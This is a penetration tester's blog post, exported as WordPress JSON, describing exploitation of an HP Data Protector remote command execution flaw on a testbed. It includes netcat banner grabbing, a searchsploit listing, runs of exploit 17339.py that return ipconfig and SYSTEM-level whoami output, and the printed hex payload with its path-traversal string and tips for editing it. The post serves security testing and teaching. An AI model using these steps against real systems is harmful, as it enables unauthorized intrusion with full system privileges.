{"id":327,"date":"2012-01-18T10:51:49","date_gmt":"2012-01-18T09:51:49","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=327"},"modified":"2012-02-03T09:32:10","modified_gmt":"2012-02-03T08:32:10","slug":"hp-data-protector","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/01\/18\/hp-data-protector\/","title":{"rendered":"HP Data Protector <6.20 vulnerability"},"content":{"rendered":"

Ok so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service(all of the output below is from my own testbed, hence the local 192.168.x.x IPs):<\/p>\n

1
2
3
4
<\/div><\/td>
root@bt:~# <\/span>nc 192.168.0.18 5555<\/span>
\nbreak<\/span>
\nHP Data Protector A.06.11: INET, internal build 243<\/span>, built on 25<\/span> August 2009<\/span>, 13<\/span>:08
\nroot@bt:~#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

This version is flagged as vulnerable as per this HP Security Bulletin<\/a>. A little digging with exploitdb found the following exploits:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<\/div><\/td>
root@bt:~# <\/span>\/<\/span>pentest\/<\/span>exploits\/<\/span>exploitdb\/<\/span>searchsploit protector
\n Description                                                                 Path
\n---------------------------------------------------------------------------<\/span> -------------------------<\/span>
\nHP Data Protector 4.00<\/span>-SP1b43064 Remote Memory Leak\/<\/span>Dos Exploit             \/<\/span>windows\/<\/span>dos\/<\/span>9006<\/span>.py
\nHP Data Protector 4.00<\/span>-SP1b43064 Remote Memory Leak\/<\/span>Dos (<\/span>meta)<\/span>              \/<\/span>windows\/<\/span>dos\/<\/span>9007<\/span>.rb
\nHP Data Protector Media Operations 6.11<\/span> Multiple Modules NULL Pointer Dereference DoS \/<\/span>windows\/<\/span>dos\/<\/span>14974<\/span>.txt
\nHP Data Protector Media Operations NULL Pointer Dereference Remote DoS      \/<\/span>win32\/<\/span>dos\/<\/span>15214<\/span>.py
\nHP Data Protector Media Operations 6.11<\/span> HTTP Server Remote Integer Overflow DoS \/<\/span>windows\/<\/span>dos\/<\/span>15307<\/span>.py
\nHP Data Protector Manager A.06.11 MMD NULL Pointer Dereference Denial of Service \/<\/span>windows\/<\/span>dos\/<\/span>15649<\/span>.pl
\nHP Data Protector Manager v6.11 Remote DoS in<\/span> RDS Service                   \/<\/span>windows\/<\/span>dos\/<\/span>15940<\/span>.pl
\nHP Data Protector Client EXEC_CMD Remote Code Execution PoC (<\/span>ZDI-11<\/span>-055)<\/span>    \/<\/span>windows\/<\/span>remote\/<\/span>17339<\/span>.py
\nHP Data Protector Client EXEC_SETUP Remote Code Execution PoC (<\/span>ZDI-11<\/span>-056)<\/span>  \/<\/span>windows\/<\/span>remote\/<\/span>17345<\/span>.py
\nHP Data Protector 6.20<\/span> Multiple Vulnerabilities                             \/<\/span>windows\/<\/span>dos\/<\/span>17458<\/span>.txt
\nHP Data Protector 6.20<\/span> EXEC_CMD Buffer Overflow Vulnerability               \/<\/span>windows\/<\/span>dos\/<\/span>17461<\/span>.txt
\nHP Data Protector 6.11<\/span> Remote Buffer Overflow + DEP Bypass                  \/<\/span>windows\/<\/span>remote\/<\/span>17468<\/span>.py
\nHP Data Protector Remote Shell for<\/span> HP-UX                                    \/<\/span>hp-ux\/<\/span>remote\/<\/span>17614<\/span>.sh
\nHP Data Protector Remote Root Shell for<\/span> Linux                               \/<\/span>linux\/<\/span>remote\/<\/span>17648<\/span>.sh
\nHP Data Protector Media Operations <<\/span>= 6.20<\/span> Directory Traversal              \/<\/span>windows\/<\/span>webapps\/<\/span>18077<\/span>.txt
\nroot@bt:~#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Of interest are these 2:<\/p>\n

1
2
<\/div><\/td>
HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)    \/windows\/remote\/17339.py
\nHP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)  \/windows\/remote\/17345.py<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

As I dont have time to edit the shellcode in the second example we’ll just play with the first for now.
\nThe first just runs a command and replays the output to the terminal, the second attempts to download and run the command.
\nThe exploit is as simple as just pointing it to the target and executing:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<\/div><\/td>
root@bt:~# <\/span>python 17339<\/span>.py 192.168.0.18 5555<\/span>
\nSending payload
\n[<\/span>70<\/span>:18<\/span>]<\/span>
\n[<\/span>70<\/span>:18<\/span>]<\/span> Windows IP Configuration
\n[<\/span>70<\/span>:18<\/span>]<\/span>
\n[<\/span>70<\/span>:18<\/span>]<\/span>
\n[<\/span>70<\/span>:18<\/span>]<\/span> Ethernet adapter INTERNAL_LAN:
\n[<\/span>70<\/span>:18<\/span>]<\/span>    Connection-specific DNS Suffix  . :
\n[<\/span>70<\/span>:18<\/span>]<\/span>    IP Address. . . . . . . . . . . . : 192.168.100.1
\n[<\/span>70<\/span>:18<\/span>]<\/span>    Default Gateway . . . . . . . . . : 192.168.100.1
\n[<\/span>70<\/span>:18<\/span>]<\/span> Ethernet adapter Bridged:
\n[<\/span>70<\/span>:18<\/span>]<\/span>    Connection-specific DNS Suffix  . :
\n[<\/span>70<\/span>:18<\/span>]<\/span>    IP Address. . . . . . . . . . . . : 192.168.0.18
\n[<\/span>70<\/span>:18<\/span>]<\/span>    Subnet Mask . . . . . . . . . . . : 255.255.255.0
\n[<\/span>70<\/span>:18<\/span>]<\/span>    Default Gateway . . . . . . . . . : 192.168.0.1
\nroot@bt:~#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

A quick look at the shellcode looks like it attempts to run as SYSTEM:<\/p>\n

1
2
3
4
5
<\/div><\/td>
\\x00\\x00\\x00\\xa4\\x20\\x32\\x00\\x20\\x66\\x64\\x69\\x73\\x6b\\x79\\x6f\\x75\\x00\\x20\\x30\\x00\\x20\\x53\\x59\\x53\\x54\\x45\\x4d\\x00\\x20\\x66\\x64\\x69\\x73\\x6b\\x79\\x6f\\x75\\x00\\x20\\x43\\x00\\x20\\x32\\x30\\x00\\x20\\x66\\x64\\x69\\x73\\x6b\\x79\\x6f\\x75\\x00\\x20\\x50\\x6f\\x63\\x00\\x20\\x4e\\x54\\x41\\x55\\x54\\x48\\x4f\\x52\\x49\\x54\\x59\\x00\\x20\\x4e\\x54\\x41\\x55\\x54\\x48\\x4f\\x52\\x49\\x54\\x59\\x00\\x20\\x4e\\x54\\x41\\x55\\x54\\x48\\x4f\\x52\\x49\\x54\\x59\\x00\\x20\\x30\\x00\\x20\\x30\\x00\\x20\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x5c\\x77\\x69\\x6e\\x64\\x6f\\x77\\x73\\x5c\\x73\\x79\\x73\\x74\\x65\\x6d\\x33\\x32\\x5c\\x69\\x70\\x63\\x6f\\x6e\\x66\\x69\\x67\\x2e\\x65\\x78\\x65\\x00\\x00
\n
\nTranslates into:
\n
\n\u00a4 2 fdiskyou 0 SYSTEM fdiskyou C 20 fdiskyou Poc NTAUTHORITY NTAUTHORITY NTAUTHORITY 0 0 ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/\\windows\\system32\\ipconfig.exe<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

One thing to note is that this will not work on a Win2K box unless you replace \/windows\/ with \/WINNT\/. I quickly edited the shellcode to run the whoami.exe command instead to confirm the useraccount we have exploited:<\/p>\n

1
2
3
4
<\/div><\/td>
root@bt:~# <\/span>python 17339<\/span>.py 192.168.0.18 5555<\/span>
\nSending payload
\n[<\/span>70<\/span>:18<\/span>]<\/span> nt authority\\system
\nroot@bt:~#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Sweet so it works.
\nAfterword<\/strong>, although there is an exploit in metasploit that supposedly works it isnt designed for windows targets and to get it to work you have to bodge it and it still only sends 4 characters, pointless:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
<\/div><\/td>
msf  exploit(<\/span>openview_omniback_exec)<\/span> ><\/span> info
\n
\n       Name: HP OpenView OmniBack II Command Execution
\n     Module: exploit\/<\/span>multi\/<\/span>misc\/<\/span>openview_omniback_exec
\nSNIP
\nDescription:
\n  This module uses a vulnerability in<\/span> the OpenView Omniback II service
\n  to execute arbitrary commands. This vulnerability was discovered by
\n  DiGiT and his code was used as<\/span> the basis for<\/span> this module. For
\n  Microsoft Windows targets, due to module limitations, use the
\n  "unix\/cmd\/generic"<\/span> payload and set<\/span> CMD to your command. You can only
\n  pass a small amount of characters (<\/span>4<\/span>)<\/span> to the command<\/span> line on
\n  Windows.<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"

Ok so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service(all of the output below is from my own testbed, hence the local 192.168.x.x IPs): 1234root@bt:~# nc 192.168.0.18 5555 break HP Data Protector A.06.11: INET, internal build […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,1],"tags":[134,133,131,130,132],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/327"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=327"}],"version-history":[{"count":12,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/327\/revisions"}],"predecessor-version":[{"id":349,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/327\/revisions\/349"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=327"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=327"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=327"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}